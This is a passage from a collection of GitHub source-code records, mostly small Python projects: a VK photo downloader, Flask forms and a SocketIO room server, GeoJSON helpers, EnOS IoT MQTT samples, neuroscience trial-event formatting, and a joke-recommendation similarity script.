sizes_list):\n typ = 'a'\n max_el = {}\n for el in sizes_list:\n if el['type'] > typ:\n typ = el['type']\n max_el = el\n return max_el\n\n def read_photos(self, user_id=None, count=50):\n if user_id is None:\n user_id = self.owner_id\n\n print(f'Получаем фотографии из VK для профиля {self.get_name(user_id)} (ID={user_id})')\n\n photos = []\n vk_photos = self.get_photos(user_id, count)\n for item in vk_photos['response']['items']:\n quality_photo = self.max_quality(item['sizes'])\n\n photos.append({\n 'date': datetime.utcfromtimestamp(item['date']).strftime('%Y%m%d_%H%M%S'),\n 'likes': item['likes']['count'],\n 'url': quality_photo['url'],\n 'size': quality_photo['type']\n })\n print(f'Найдено фотографий: {len(photos)}')\n return 
photos\n","repo_name":"TVP-18/py-diplom-basic","sub_path":"vk.py","file_name":"vk.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10404379624","text":"from torch.optim import lr_scheduler\r\n\r\n\r\ndef get_scheduler(scheduler_str) -> object:\r\n scheduler = None\r\n\r\n if scheduler_str == 'CosineAnnealingLR':\r\n\r\n scheduler = lr_scheduler.CosineAnnealingLR\r\n\r\n elif scheduler_str == 'CosineAnnealingWarmRestarts':\r\n\r\n scheduler = lr_scheduler.CosineAnnealingWarmRestarts\r\n\r\n elif scheduler_str == \"ReduceLROnPlateau\":\r\n scheduler = lr_scheduler.ReduceLROnPlateau\r\n\r\n if scheduler is None:\r\n raise Exception(f\"'{scheduler}': This optimizer does not exist.\")\r\n return scheduler","repo_name":"co1dtype/Dacon_Text_Recognition","sub_path":"modules/schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22315845056","text":"from flask.app import Flask\nfrom flask_wtf import FlaskForm\nfrom wtforms import IntegerField, StringField, SubmitField\nfrom wtforms.fields.core import RadioField\nfrom wtforms.validators import AnyOf, InputRequired\n\nclass FieldsRequiredForm(FlaskForm):\n \"\"\"Require all fields to have content. This works around the bug that WTForms radio\n fields don't honor the `DataRequired` or `InputRequired` validators.\n \"\"\"\n\n class Meta:\n def render_field(self, field, render_kw):\n render_kw.setdefault('required', True)\n return super().render_field(field, render_kw)\n\nclass PredictDataForm(FieldsRequiredForm):\n passenger_class = RadioField('Passenger class', choices=[(1, 'First'), (2, 'Second'), (3, 'Third')], coerce=int)\n sex = RadioField('Sex', choices=[(0, 'Male'), (1, 'Female')], coerce=int)\n age = IntegerField('Age', validators=[InputRequired()])\n siblings_or_spouse = IntegerField('Number of siblings or spouses aboard', validators=[InputRequired()])\n parch = IntegerField('Number of parents or children aboard', validators=[InputRequired()])\n fare = IntegerField('Fare', validators=[InputRequired()])\n embarked = StringField('Embarked', validators=[InputRequired(), AnyOf(['cherbourg', 'queenstown', 'southampton'])])\n embarked = RadioField('Embarked', choices=[('cherbourg', 'Cherbourg'), ('queenstown', 'Queenstown') ,('southampton', 'Southampton')])\n submit = SubmitField('Submit')\n\n","repo_name":"TomekQ13/RealTimePrediction","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70127834932","text":"import funcoes\nimport os\n\nwhile True:\n print(\"\"\"\\nO que deseja fazer?\n [1] Cadastrar um novo cartão\n [2] Ver os cartões cadastrados\n [3] Excluir um cartão\n [4] Verificar Preço ideal para um produto\"\"\")\n\n while True:\n escolha = input('Escolha: ')\n try:\n escolha = int(escolha)\n break\n except ValueError as error:\n print('Digite um numero valido!')\n except Exception as error:\n print(f'Erro nao esperado. 
{error}')\n\n if escolha == 1:\n funcoes.add_cartao()\n\n if escolha == 2:\n try:\n print(funcoes.ver_cartoes())\n\n\n except Exception:\n print('Nao há cartoes registrados.')\n\n if escolha == 3:\n funcoes.remover_cartao()\n\n if escolha == 4:\n funcoes.venda()\n\n if escolha >4:\n print('Escolha uma opcao valida!')\n close = 0\n while True:\n fechar_programa = input('Se deseja continuar digite [S]im ou [N]ão : ').upper()\n if fechar_programa == 'S':\n break\n elif fechar_programa == 'N':\n close = 1\n break\n else:\n print('Opcao invalida')\n if close == 1:\n break\n os.system('cls')","repo_name":"Kaique-Silva-Sousa/Preco-Ideal","sub_path":"inicio.py","file_name":"inicio.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75055920691","text":"import torch\r\nimport math\r\n\r\n\r\nclass Atba:\r\n def get_action(self, spatial, car_stats):\r\n action = torch.zeros(9)\r\n\r\n left_vector = spatial[:, 10]\r\n forward_vector = spatial[:, 9]\r\n up_vector = spatial[:, 11]\r\n car_location = spatial[:, 0]\r\n ball_location = spatial[:, 2]\r\n goal_location = torch.tensor([0, 5.12, 0.3], dtype=torch.float)\r\n own_goal_location = torch.tensor([0, -5.12, 0.3], dtype=torch.float)\r\n\r\n relative_ball = ball_location - car_location\r\n ball_distance = relative_ball.norm()\r\n relative_ball /= ball_distance\r\n relative_goal = goal_location - car_location\r\n relative_goal /= relative_goal.norm()\r\n relative_own_goal = own_goal_location - car_location\r\n relative_own_goal /= relative_own_goal.norm()\r\n\r\n # offence/ defence switching\r\n\r\n offence = (1 + ball_location[1] / 5.12) / 2\r\n defence = 1 - offence\r\n\r\n ball_direction = (1 + offence * relative_ball @ relative_goal - defence * relative_ball @ relative_own_goal)/2\r\n ball_direction = pow(ball_direction, 1.4)\r\n not_ball_direction = 1 - ball_direction\r\n\r\n car_offence = (1 + car_location[1] / 5.12) / 2\r\n car_defence = 1 - car_offence\r\n\r\n # controls\r\n\r\n left_ball = relative_ball @ left_vector\r\n left_opp_goal = relative_goal @ left_vector\r\n left_own_goal = relative_own_goal @ left_vector\r\n left_goal = car_defence * left_own_goal - car_offence * left_opp_goal\r\n steer = ball_direction * left_ball + not_ball_direction * left_goal\r\n roll = ball_direction * left_goal + not_ball_direction * -left_vector[2]\r\n\r\n forward_ball = relative_ball @ forward_vector\r\n forward_opp_goal = relative_goal @ forward_vector\r\n forward_own_goal = relative_own_goal @ forward_vector\r\n forward_goal = car_defence * forward_own_goal - car_offence * forward_opp_goal\r\n pitch = ball_direction * forward_goal + not_ball_direction * forward_vector[2]\r\n\r\n up_ball = relative_ball @ up_vector\r\n jump = ball_direction * up_ball + not_ball_direction * -1\r\n throttle = ball_direction * math.copysign(pow(1 - abs(up_ball), 6), forward_ball) + not_ball_direction * 1\r\n\r\n action[0] = throttle\r\n action[1] = math.copysign(pow(abs(pitch), 2), pitch)\r\n action[2] = 1 if throttle > 0.75 else -1\r\n action[3] = 1 if abs(steer) > 0.65 else -1\r\n action[4] = jump if ball_distance < 0.4 else -1\r\n action[5] = 1 if ball_distance < 0.3 else -1\r\n action[6] = math.copysign(pow(abs(roll), 2), -roll)\r\n action[7] = math.copysign(pow(abs(steer), 0.1), steer)\r\n action[8] = math.copysign(pow(abs(steer), 0.1), steer)\r\n\r\n return 
action\r\n","repo_name":"LHolten/Leviathan","sub_path":"cool_atba/cool_atba.py","file_name":"cool_atba.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22568271966","text":"from furbain import config\n\n\n# Converts hh:mm:ss time to x days x hours x minutes x seconds\ndef formatTimeToIntervalType(time):\n if time is not None and isinstance(time, str):\n time = time.split(':')\n formattedTime = \"\"\n if int(time[0]) > 23:\n formattedTime += str(int(time[0]) // 24) + \" days \"\n time[0] = int(time[0]) % 24\n \n formattedTime += f'{time[0]} hours {time[1]} minutes {time[2]} seconds'\n return formattedTime\n else:\n return None\n \n\n# Returns the time in hh:mm:ss format\ndef getFormattedTime(timeInSeconds):\n if timeInSeconds is not None:\n if isinstance(timeInSeconds, float):\n timeInSeconds = int(timeInSeconds)\n m, s = divmod(timeInSeconds, 60)\n h, m = divmod(m, 60)\n if h < 10:\n h = '0' + str(h)\n else:\n h = str(h)\n return f'{h}:{m:02d}:{s:02d}'\n else:\n return None\n\n# Receive a time in a string with 'hh:mm:ss' format and return the time in seconds (int)\ndef getTimeInSeconds(time):\n if time is not None and isinstance(time, str):\n time = time.split(':')\n return int(time[0]) * 3600 + int(time[1]) * 60 + int(time[2])\n else:\n return None\n\n# converts a list of x lists to a string and replace Angle bracket with parenthesis\n# [[[1, 2], [3,4], [5,6]]] -> \"(((1,2) (3,4) (5,6)))\"\ndef convertListToString(listToConvert):\n if isinstance(listToConvert, list):\n return \" \".join(map(convertListToString, listToConvert)) + \")\"\n else:\n return str(listToConvert)\n\n\n# format geojson polygon to a postgis polygon\ndef formatGeoJSONPolygonToPostgisPolygon(coordinates, geometryType, epsg):\n polygon = convertListToString(coordinates)\n polygon = polygon.replace(\") \", \", \")\n \n # Removing 1 level of parenthesis\n # (((1,2) (3,4) (5,6))) -> ((1,2) (3,4) (5,6))\n # this caused an error while creating the geometry\n nbEndingParenthesis = polygon.count(\")\")\n polygon = polygon[:-1]\n nbEndingParenthesis -= 1\n \n # adding nbEndingParenthesis parenthesis at the beginning\n polygon = \"(\" * nbEndingParenthesis + polygon \n polygon = geometryType + polygon\n\n return polygon\n\n\n# Return the EPSG of the geojson\n# if not found return the SRID of the database\ndef getEPSGFromGeoJSON(gjson):\n epsg = None\n dbSRID = config.getDatabaseSRID()\n \n try:\n crs = gjson['crs']['properties']['name']\n \n # get the EPSG code\n for i in crs.split(':'):\n if i.isdigit():\n epsg = int(i)\n break\n \n if epsg is None:\n raise Exception(\"No EPSG code found in the GeoJSON file\")\n elif str(epsg) != dbSRID:\n print(f\"WARNING : The EPSG code of the GeoJSON file {epsg} is different from the EPSG code of the database {dbSRID}\")\n \n\n except:\n epsg = dbSRID\n print(f\"No EPSG code found in the GeoJSON file, the EPSG code of the database will be used ({epsg})\")\n\n return epsg\n\n\ndef chunker(seq, size):\n # from http://stackoverflow.com/a/434328\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n# returns the coordinates and geometry type of the geojson feature\ndef parseFeature(feature):\n coordinates = None\n geometryType = None\n \n geometry = feature[\"geometry\"]\n \n if geometry is not None:\n coordinates = geometry[\"coordinates\"]\n if coordinates is None or len(coordinates) == 0:\n coordinates = None\n else:\n geometryType = geometry[\"type\"]\n \n \n return 
coordinates, geometryType","repo_name":"gabRpt/matsim-output-postgreSQL-converter","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3615844599","text":"import pygame,math\n\ndef get_collisions(rect,platforms):\n data = []\n for platform in platforms:\n if rect.colliderect(platform):\n data.append(platform)\n return data\n\nids = 0 \n\nclass Physics:\n\n def __init__(self,x,y,width,height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.rect = pygame.Rect(x,y,width,height)\n\n def move(self,velocity,platforms):\n collisions_data = {'left': False, 'right': False, 'top': False, 'bottom': False}\n self.rect.x += velocity[0]\n obstacles = get_collisions(self.rect,platforms)\n self.x = int(self.rect.x)\n\n for obstacle in obstacles:\n if velocity[0] > 0:\n self.rect.right = obstacle.left\n collisions_data['right'] = True\n if velocity[0] < 0:\n self.rect.left = obstacle.right\n collisions_data['left'] = True\n\n self.rect.y += velocity[1]\n obstacles = get_collisions(self.rect,platforms)\n self.y = int(self.rect.y)\n\n for obstacle in obstacles:\n if velocity[1] > 0:\n self.rect.bottom = obstacle.top\n collisions_data['bottom'] = True\n if velocity[1] < 0:\n self.rect.top = obstacle.bottom\n collisions_data['top'] = True\n\n return collisions_data\n \nclass GameObject:\n\n def __init__(self,x,y,width,height,animation_data=None,animated=False,default_animation=None,offset=[0, 0]): # animated = boolean to show if the entity is animated or not\n global ids\n ids += 1\n self.id = ids\n self.frame_no = 0\n self.animated = animated\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n self.physics = Physics(self.x,self.y,width,height)\n self.animator = Animator(self.id)\n self.current_animation = default_animation\n self.flip = [False,False]\n if animation_data != None:\n self.animator.load_animation(animation_data)\n self.rotation = 0\n self.offset = offset\n\n\n #self.physics.rect = pygame.Rect(self.physics.x + self.offset[0], self.physics.y + self.offset[1], self.width - self.offset[0], self.height - self.offset[1])\n\n def update(self,velocity,platforms, offset=[0,0], rect_size=None):\n if rect_size != None:\n self.physics.rect.size = rect_size\n collisions_data = self.physics.move(velocity,platforms)\n self.set_pos(self.physics.rect.x + offset[0], self.physics.rect.y + offset[1])\n if self.animated:\n self.frame_no = (self.frame_no + 1) % self.current_animation_frames_quantity()\n frame_index = self.get_frame()\n frame = self.current_animation_frames()[frame_index]\n return collisions_data,frame\n else:\n return collisions_data\n \n def rect_center(self):\n return self.physics.rect.center\n def get_frame(self):\n return self.frame_no\n\n def set_pos(self,x,y):\n self.x = x\n self.y = y\n def current_animation_frames_quantity(self):\n return len(self.get_frames()[self.current_animation])\n def current_animation_frames(self):\n return self.animator.frames[self.current_animation]\n\n def draw(self,surf,*scroll):\n pygame.draw.rect(surf,(255,0,0),pygame.Rect(self.physics.x - scroll[0], self.physics.y - scroll[1], *self.physics.rect.size))\n\n def display(self,image,surf,scroll_x,scroll_y):\n surf.blit(pygame.transform.flip(pygame.transform.rotate(image,self.rotation),self.flip[0],self.flip[1]),(self.x - self.offset[0] - scroll_x,self.y - self.offset[1] -scroll_y))\n\n def get_center(self):\n return 
self.x ,self.y\n\n def get_frames(self):\n return self.animator.get_frames()\n\n def change_animation(self,animation):\n if self.animated:\n self.frame_no = 0\n self.current_animation = animation\n self.current_animation_frames_quantity()\n self.current_animation_frames()\n \n \nclass Animator:\n\n def __init__(self,entity_id):\n self.frames = {}\n self.entity_id = entity_id\n \n def load_animation(self,animation_data): # [['run',(2,3,4,6)]]\n for data in animation_data:\n self.frames[data[0]] = []\n for i,frame_count in enumerate(data[1]):\n for j in range(frame_count):\n frame_name = data[0] + '_' + str(i)\n self.frames[data[0]].append(frame_name)\n \n return self.frames\n def get_frames(self):\n return self.frames\n \n def set_animation(self):\n pass\n def change_animation(self):\n pass\n def play(self,animation,duration):\n pass\n \n\n\n\nanimation_manager = {} # information on animation of every entity\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"melonead/water-wars","sub_path":"game_entity.py","file_name":"game_entity.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35477401643","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO,emit\nimport json,cppimport\nimport scramble\n\n\nclib = cppimport.imp(\"clib\")\n\n\napp = Flask(__name__,\n static_url_path='', \n static_folder='static',)\nsapp = SocketIO(app)\n\n@app.route(\"/room\")\ndef room():\n\treturn render_template(\"room.html\")\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n\n@sapp.on('getIDR')\ndef connect(d):\n\tr = d[\"data\"]\n\tprint(f\"USED ID {r}\")\n\t\n@sapp.on('setEVN')\ndef sevn(d):\n\ti = int(d[\"id\"])\n\tevn = d[\"evn\"]\n\tclib.set_event(i,evn)\n\tprint('setEVN')\n\temit('change_event',json.dumps({\"evn\":evn,\"rid\":str(i)}),broadcast=True)\n\n@sapp.on(\"update\")\ndef handle_ge(data):\n\td = json.loads(data['data'])\n\td['id'] = str(d['id'])\n\tclib.parse(d)\n\t\n\t\n\t\n\temit(\"retupdate\",[json.dumps(clib.get(int(d[\"id\"]))),int(d[\"id\"])], broadcast=True)\n\n@sapp.on(\"newr\")\ndef handle_nr(data):\n\td = int(data['data'])\n\tclib.clear(d)\n\t\n\temit(\"retupdate\",[\"{}\",d], broadcast=True)\n\tevent = clib.get_event(d)\n\tscr = scramble.scrambled[event]()\n\temit(\"newscramb\",[scr,d],broadcast=True)\n\n\n\n\n\n\t\nsapp.run(app,host=\"0.0.0.0\")\n","repo_name":"kellantech/cuberooms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26175736816","text":"import time\nfrom random import random\nfrom enos.core.MqttClient import MqttClient\nimport random\n\nfrom enos.message.upstream.resume.MeasurepointResumeBatchRequest import MeasurepointResumeBatchRequest\nfrom enos.message.upstream.resume.MeasurepointResumeRequest import MeasurepointResumeRequest\nfrom enos.message.upstream.status.SubDeviceLoginBatchRequest import SubDeviceLoginBatchRequest\nfrom enos.message.upstream.status.SubDeviceLoginRequest import SubDeviceLoginRequest\nfrom enos.sample.SampleHelper import SampleHelper\n\n\ndef post_measure_point_resume():\n \"\"\"this sample is to resume report one measurepoint\"\"\"\n login_sub_device_request = SubDeviceLoginRequest.builder() \\\n .set_sub_device_info(SampleHelper.SUB1_PRODUCT_KEY,\n SampleHelper.SUB1_DEVICE_KEY,\n SampleHelper.SUB1_DEVICE_SECRET) \\\n .build()\n 
login_sub_device_response = client.publish(login_sub_device_request)\n if login_sub_device_response:\n print('login_sub_device_response: %s' % login_sub_device_response.get_code())\n\n post_measure_point_request_resume = MeasurepointResumeRequest.builder() \\\n .set_product_key(SampleHelper.SUB1_PRODUCT_KEY).set_device_key(SampleHelper.SUB1_DEVICE_KEY) \\\n .add_measure_point('wywpoint1', random.randint(100, 200)) \\\n .add_measure_points(SampleHelper.MEASURE_POINTS) \\\n .build()\n post_measure_point_resume_response = client.publish(post_measure_point_request_resume)\n if post_measure_point_resume_response:\n print('post_measure_point_resume_response: %s' % post_measure_point_resume_response.get_code())\n\n\ndef post_measure_point_resume_batch(allow, skip):\n \"\"\"this sample is to resume report batch measurepoint\"\"\"\n login_batch_sub_device_request = SubDeviceLoginBatchRequest.builder() \\\n .add_sub_device_info(SampleHelper.SUB1_PRODUCT_KEY,\n SampleHelper.SUB1_DEVICE_KEY,\n SampleHelper.SUB1_DEVICE_SECRET) \\\n .add_sub_device_info(SampleHelper.SUB3_PRODUCT_KEY,\n SampleHelper.SUB3_DEVICE_KEY,\n SampleHelper.SUB3_DEVICE_SECRET) \\\n .build()\n login_batch_sub_device_response = client.publish(login_batch_sub_device_request)\n if login_batch_sub_device_response:\n print('login_sub_batch_response: %s' % login_batch_sub_device_response.get_code())\n\n post_measure_point_resume_requests = list()\n post_measure_point_resume_requests.append(\n MeasurepointResumeRequest.builder().set_product_key(SampleHelper.SUB_DEVICES[0].get_product_key())\n .set_device_key(SampleHelper.SUB_DEVICES[0].get_device_key())\n .add_measure_point('wywpoint2', random.randint(100, 200))\n .build())\n post_measure_point_resume_requests.append(\n MeasurepointResumeRequest.builder().set_product_key(SampleHelper.SUB_DEVICES[1].get_product_key())\n .set_device_key(SampleHelper.SUB_DEVICES[1].get_device_key())\n .add_measure_point('wywpoint1', random.randint(100, 200))\n .add_measure_points(SampleHelper.MEASURE_POINTS)\n .build())\n\n post_measure_point_resume_batch_request = MeasurepointResumeBatchRequest.builder() \\\n .add_request(post_measure_point_resume_requests[0]) \\\n .add_request(post_measure_point_resume_requests[1]) \\\n .add_requests(post_measure_point_resume_requests) \\\n .set_allow_offline_sub_device(allow) \\\n .set_skip_invalid_measurepoints(skip) \\\n .build()\n post_measure_point_resume_batch_response = client.publish(post_measure_point_resume_batch_request)\n if post_measure_point_resume_batch_response:\n print('Measurepoint_Resume_Batch_response: %s' % post_measure_point_resume_batch_response.get_code())\n print('Measurepoint_Resume_Batch_response: %s' % post_measure_point_resume_batch_response.get_message())\n\n\nif __name__ == \"__main__\":\n client = MqttClient(SampleHelper.TCP_SERVER_URL, SampleHelper.GW1_PRODUCT_KEY, SampleHelper.GW1_DEVICE_KEY,\n SampleHelper.GW1_DEVICE_SECRET)\n client.get_profile().set_auto_reconnect(True) # if connection interrupted, the client can automaticlly reconnect\n client.setup_basic_logger('INFO')\n client.connect() # connect in sync\n while True:\n post_measure_point_resume()\n timestamp = int(time.time() * 1000)\n post_measure_point_resume_batch(True, False)\n time.sleep(10)\n","repo_name":"EnvisionIot/enos-device-sdk-python","sub_path":"enos/sample/MeasurepointResumeSample.py","file_name":"MeasurepointResumeSample.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} 
+{"seq_id":"18157745188","text":"from SessionAnalysis.utils.format_trial_dicts import format_maestro_events\n\n\n\ndef rename_stab_probe_trials(maestro_data):\n \"\"\"Kept this direct and simple rather than more general and flexible since\n hopefull I won't need to do this a lot.\n \"\"\"\n tune_names = [\"0\", \"90\", \"180\", \"270\"]\n learn_names = ['Right-Up', 'Right-Dn',\n 'Up-Rt', 'Up-Lt',\n 'Left-Up', 'Left-Dn',\n 'Down-Rt', 'Down-Lt',\n 'Dn-Rt', 'Dn-Lt']\n learn_names = [x.lower() for x in learn_names]\n found_learn = False\n no_set_name = False\n print_stab = True\n print_learn = True\n for t in maestro_data:\n if t['header']['name'] in ['90Stab', '0Stab', '180Stab','270Stab']:\n if not t['header']['UsedStab']:\n raise ValueError(\"Trial name is {0} but 'UsedStab' is {1}.\".format(t['header']['name'], t['header']['UsedStab']))\n if t['header']['name'] in [\"0\", \"90\", \"180\", \"270\"]:\n # try:\n # # This is only available in Maestro version >= 4.0\n # # print(t['header']['name'])\n # # print(t['header']['set_name'])\n # if t['header']['set_name'].lower() in learn_names:\n # found_learn = True\n # except KeyError:\n # no_set_name = True\n if t['header']['UsedStab']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n if print_stab:\n print(\"This file has stabilization but trial names do not reflect this! Added 'Stab' to tuning names.\")\n print_stab = False\n if (\"-left\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-left\", \"-lt\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-right\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-right\", \"-rt\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-down\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-down\", \"-dn\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-up\" in t['header']['name']):\n # Should already be named correctly so just check Stab\n old_name = t['header']['name']\n # new_name = t['header']['name'].replace(\"-up\", \"-up\")\n # t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n\n # if no_set_name:\n # print(\"File does not have set name\")\n # elif not found_learn:\n # raise ValueError(\"Could not find learning trials within the learning set names provided\")\n\n return None\n\n\ndef 
name_trial_events(maestro_data, is_weird_Yoda=False):\n \"\"\"Assigns the event names to the event times dictionary for each trial\n IN PLACE.\n\n NOTE THAT the post learning standard tuning block in Dandy is messed up\n because it has the extra events as used for the Stab tuning!!! So these\n are explicitly caught and renamed....\n \"\"\"\n\n # Set hard coded variables for expected trial name dictionaries.\n if is_weird_Yoda:\n event_names_fixation = {\n \"fixation_onset\": [2, 0]\n }\n event_names_rand_vp = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stand_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [1, 1],\n \"target_offset\": [1, 3]\n }\n event_names_stab_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n event_names_learning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [1, 1],\n \"instruction_onset\": [1, 2],\n \"target_offset\": [1, 3]\n }\n else:\n event_names_fixation = {\n \"fixation_onset\": [2, 0]\n }\n event_names_rand_vp = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stand_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stab_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n event_names_learning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n\n weird_yoda_tuning_trials = ['195', '165', '210', '315', '150', '225', '45',\n '135', '255', '285', '240', '300', '120', '105',\n '75', '60']\n\n # Generate the naming dictionary for each trial name\n maestro_trial_names = set()\n for t in maestro_data:\n if t['header']['name'] not in maestro_trial_names:\n maestro_trial_names.add(t['header']['name'])\n event_names_by_trial = {}\n for t_name in maestro_trial_names:\n if \"fix\" in t_name:\n event_names_by_trial[t_name] = event_names_fixation\n elif \"RandVP\" in t_name:\n event_names_by_trial[t_name] = event_names_rand_vp\n elif (t_name in [\"0\", \"90\", \"180\", \"270\"]):\n event_names_by_trial[t_name] = event_names_stand_tuning\n elif t_name in [\"0Stab\", \"90Stab\", \"180Stab\", \"270Stab\"]:\n event_names_by_trial[t_name] = event_names_stab_tuning\n elif \"-rt\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-up\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-lt\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-dn\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif t_name in weird_yoda_tuning_trials:\n event_names_by_trial[t_name] = event_names_stand_tuning\n else:\n raise ValueError(\"Trial name '{0}' not found! 
Names present: {1}\".format(t_name, maestro_trial_names))\n\n format_maestro_events(maestro_data, event_names_by_trial,\n missing_event=None, convert_to_ms=True)\n\n return None\n","repo_name":"njh27/LearnDirTunePurk","sub_path":"LearnDirTunePurk/format_trials.py","file_name":"format_trials.py","file_ext":"py","file_size_in_byte":8594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877577654","text":"import sys\n\nresult = list()\n\nwhile True:\n l, p, v = map(int, sys.stdin.readline().split())\n\n if l == 0 or p == 0 or v == 0:\n break\n\n camp = l*(v//p)\n if v % p < l:\n camp += v % p\n else:\n camp += l\n\n result.append(camp)\n\nfor i in range(len(result)):\n print(\"Case %d: %d\" % (i+1, result[i]))\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210310/4976 캠핑.py","file_name":"4976 캠핑.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23457037119","text":"import csv\nimport math\nimport itertools\nfrom collections import Counter\n\n#Item-based collaborative filtering with Adjusted cosine similarity\n\nnum_jokes=100\nnum_users=24983\n#24983\n\nuserLines=None\nwith open('./jester-data-2.csv', 'r') as f:\n reader=csv.reader(f)\n userLines=list(reader)\n\njokesscore={}\nuserscore={}\nusermean={}\nfor i in xrange(0,num_users):\n userscore[i]=map(float, userLines[i])\n sums=0\n notnull=0\n for j in xrange(1,1+num_jokes):\n print [i,j]\n if userscore[i][j]!=99:\n sums+=userscore[i][j]\n notnull+=1\n usermean[i]=sums/notnull\nvectorMagnitudes = {}\nfor j in xrange(1,1+num_jokes):\n jokesscore[j]=[]\n for i in xrange(0,num_users):\n jokesscore[j].append(float(userLines[i][j])-usermean[i])\n temp=[x **2 if x!=99 else 0 for x in jokesscore[j]]\n vectorMagnitudes[j]=math.sqrt(sum(temp))\n\nwith open('./joke_similarities.csv', 'wb') as f:\n writer=csv.writer(f)\n #writer.writerow(['jokeA', 'jokeB', 'similarity'])\n jokes=list(jokesscore)\n for i, jokeA in enumerate(jokes):\n for jokeB in jokes[i+1:]:\n vectorA=jokesscore[jokeA]\n vectorB=jokesscore[jokeB]\n similarity=sum([a * b if a!=99 and b!=99 else 0 for a, b in zip(vectorA, vectorB)])\n similarity/=vectorMagnitudes[jokeA] * vectorMagnitudes[jokeB]\n writer.writerow([jokeA, jokeB, '%.4f'%similarity])\n \n","repo_name":"ynyeh0221/Jokes-Recommendation-System","sub_path":"jokesnew.py","file_name":"jokesnew.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888270132","text":"from collections import 